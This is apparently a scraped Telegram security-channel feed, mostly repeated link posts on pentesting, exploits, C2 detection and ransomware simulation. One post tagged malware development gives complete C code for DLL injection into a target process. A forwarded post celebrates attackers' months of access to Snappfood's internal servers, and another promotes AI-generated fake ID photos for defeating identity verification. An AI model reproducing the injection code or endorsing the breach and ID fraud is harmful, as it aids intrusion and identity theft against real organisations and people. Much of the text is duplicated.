How to break bare metal firmware encryption (FortiGate firewalls) for security research.
Credits: Jon Williams (@bishopfox)
https://bishopfox.com/blog/breaking-fortinet-firmware-encryption
#firewall, #fortigate ,
———
@islemolecule_source
Credits: Jon Williams (@bishopfox)
https://bishopfox.com/blog/breaking-fortinet-firmware-encryption
#firewall, #fortigate ,
———
@islemolecule_source
Browser Extension Pentesting Methodology
credit : @hacktricks_live
https://book.hacktricks.xyz/pentesting-web/browser-extension-pentesting-methodology
#methodology
———
@islemolecule_source
credit : @hacktricks_live
https://book.hacktricks.xyz/pentesting-web/browser-extension-pentesting-methodology
#methodology
———
@islemolecule_source
Pentesting LLM apps 101
credit : @JubbaOnJeans
https://boringappsec.substack.com/p/guest-post-edition-24-pentesting
#LLM ,
———
@islemolecule_source
credit : @JubbaOnJeans
https://boringappsec.substack.com/p/guest-post-edition-24-pentesting
#LLM ,
———
@islemolecule_source
Detecting and decrypting Sliver C2 – a threat hunter’s guide
https://immersivelabs.com/blog/detecting-and-decrypting-sliver-c2-a-threat-hunters-guide/
#c2 ,
———
@islemolecule_source
https://immersivelabs.com/blog/detecting-and-decrypting-sliver-c2-a-threat-hunters-guide/
#c2 ,
———
@islemolecule_source
Course to get into Large Language Models (LLMs) with roadmaps and Colab notebooks.
credit: @maximelabonne
https://github.com/mlabonne/llm-course/tree/main
#LLM
———
@islemolecule_source
credit: @maximelabonne
https://github.com/mlabonne/llm-course/tree/main
#LLM
———
@islemolecule_source
Source Byte
PSRansom: a PowerShell Ransomware Simulator with C2 Server capabilities. https://github.com/JoelGMSec/PSRansom #c2 , #powershell , #simulat , #tool ——— @islemolecule_source
7k view & 150 likes on twitter, i really don't know what to say 🤷♀
Share posts plz
Share posts plz
great burpsuite series by Meraj Heydari
credit : @meraj_heydari
language : persian
https://www.youtube.com/playlist?list=PL7ZQRFOOo39A0kV-GK-kFaX2jGA3PMz0-
#burpsuite ,
———
@islemolecule_source
credit : @meraj_heydari
language : persian
https://www.youtube.com/playlist?list=PL7ZQRFOOo39A0kV-GK-kFaX2jGA3PMz0-
#burpsuite ,
———
@islemolecule_source
exploiting a use-after-free in Linux kernel 5.15 (Ubuntu 22.04) (CVE-2022-32250)
credit: @saidelike
research.nccgroup.com/2022/0…
#linux , #kernel , #analysis , #exploitation
__
@islemolecule_source
credit: @saidelike
research.nccgroup.com/2022/0…
#linux , #kernel , #analysis , #exploitation
__
@islemolecule_source
DLL Injection classic way
:)
1- address of the dll
2- allocate a buffer in target process
3- write dll address to that
4- create a thread to execute
#malware_dev
@islemolecule_source
:)
1- address of the dll
2- allocate a buffer in target process
3- write dll address to that
4- create a thread to execute
int main(int argc, char *argv[]) {
HANDLE processHandle;
PVOID remoteBuffer;
wchar_t dllPath[] = TEXT("C:\\experiments\\evilm64.dll");
printf("Injecting DLL to PID: %i\n", atoi(argv[1]));
processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof dllPath, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)dllPath, sizeof dllPath, NULL);
PTHREAD_START_ROUTINE threatStartRoutineAddress = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
CreateRemoteThread(processHandle, NULL, 0, threatStartRoutineAddress, remoteBuffer, 0, NULL);
CloseHandle(processHandle);
return 0;
}
iredteam#malware_dev
@islemolecule_source
Forwarded from .....
But a few months ago, we informed Snapfood indirectly about the existence of vulnerabilities
Snapfood servers were vulnerable and we had access to jira.snappfood.ir and jira.snapp.ir,... for months and warned about them but they didn't pay attention.
In this post, we thank the elites of SnapFood
بهنام نصراللهی
مهدی شکری
سپهر رشادی
According to our and other people's warnings, we are happy about what happened to SnappFood!
Please open Telegram to view this post
VIEW IN TELEGRAM
Initial Access – search-ms URI Handler
credit : @hackerfantastic
https://pentestlab.blog/2024/01/02/initial-access-search-ms-uri-handler/
#initial_access ,
———
@islemolecule_source
credit : @hackerfantastic
https://pentestlab.blog/2024/01/02/initial-access-search-ms-uri-handler/
#initial_access ,
———
@islemolecule_source
SQL Brute Force Leads to BlueSky Ransomware
credit : @1ZRR4H
https://thedfirreport.com/2023/12/04/sql-brute-force-leads-to-bluesky-ransomware/
———
@islemolecule_source
credit : @1ZRR4H
https://thedfirreport.com/2023/12/04/sql-brute-force-leads-to-bluesky-ransomware/
———
@islemolecule_source
Rust to Assembly: Understanding the Inner Workings of Rust . collection of blog posts show how Rust code maps to Assembly
https://eventhelix.com/rust/
#rust
———
@islemolecule_source
https://eventhelix.com/rust/
#rust
———
@islemolecule_source
Fuzz Everything, Everywhere, All at Once - Advanced QEMU-based fuzzing
https://media.ccc.de/v/37c3-12102-fuzz_everything_everywhere_all_at_once
#fuzzing #LibAFL #QEMU
———
@islemolecule_source
https://media.ccc.de/v/37c3-12102-fuzz_everything_everywhere_all_at_once
#fuzzing #LibAFL #QEMU
———
@islemolecule_source
We see a lot of threat actors in our Incident Response cases who disable or tamper with the local AV.
The website http://privacy.sexy has a copy & paste noscript to turn off most of Defenders features. [1] How many of these modifications (or deactivations) will trigger an alert in your environment?
@DebugPrivilege has written an excellent article about the various event logs Windows Defenders creates, in which event. [2]
Run the commands on a test system, and look for gaps in your monitoring
[1] https://privacy.sexy
[2] https://m365internals.com/2021/07/05/why-are-windows-defender-av-logs-so-important-and-how-to-monitor-them-with-azure-sentinel/
credit : @malmoeb
#AV ,
———
@islemolecule_source
The website http://privacy.sexy has a copy & paste noscript to turn off most of Defenders features. [1] How many of these modifications (or deactivations) will trigger an alert in your environment?
@DebugPrivilege has written an excellent article about the various event logs Windows Defenders creates, in which event. [2]
Run the commands on a test system, and look for gaps in your monitoring
[1] https://privacy.sexy
[2] https://m365internals.com/2021/07/05/why-are-windows-defender-av-logs-so-important-and-how-to-monitor-them-with-azure-sentinel/
credit : @malmoeb
#AV ,
———
@islemolecule_source
• Realistic “photos” were published on Reddit , which were generated by AI and are great for identity verification)) In one photo there is a girl with a sign, and in the second - with an ID card.
LINK
#informative
LINK
#informative